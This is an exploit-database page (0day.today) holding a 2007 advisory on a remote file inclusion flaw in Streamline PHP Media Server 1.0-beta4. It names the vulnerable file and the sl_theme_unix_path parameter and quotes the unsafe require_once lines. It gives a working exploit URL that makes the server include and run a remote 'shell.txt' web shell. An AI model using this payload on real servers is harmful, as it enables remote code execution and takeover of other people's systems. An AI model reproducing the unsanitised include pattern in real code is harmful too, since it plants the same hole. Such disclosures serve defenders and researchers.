[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Streamline PHP Media Server 1.0-beta4 RFI Vulnerability

Author
BiNgZa
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2152
Category
web applications
Date add
18-09-2007
Platform
unsorted
=======================================================
Streamline PHP Media Server 1.0-beta4 RFI Vulnerability
=======================================================



Vulnerability Type: Remote File Inclusion
Vulnerable file: /streamline-1.0-beta4/src/core/theme/includes/account_footer.php
Exploit URL: http://localhost/streamline-1.0-beta4/src/core/theme/includes/account_footer.php?sl_theme_unix_path=http://localhost/shell.txt?
Method: get
Register_globals: On
Vulnerable variable: sl_theme_unix_path
Line number: 2
Lines:

----------------------------------------------
<?
    require_once( $sl_theme_unix_path."/account/footer.php" );
    require_once( $sl_theme_unix_path."/common/footer.php" );

----------------------------------------------

GrEeTs To sHaDoW sEcUrItY TeAm & str0ke

FoUnD By BiNgZa

DoRk: :(



#  0day.today [2024-09-20]  #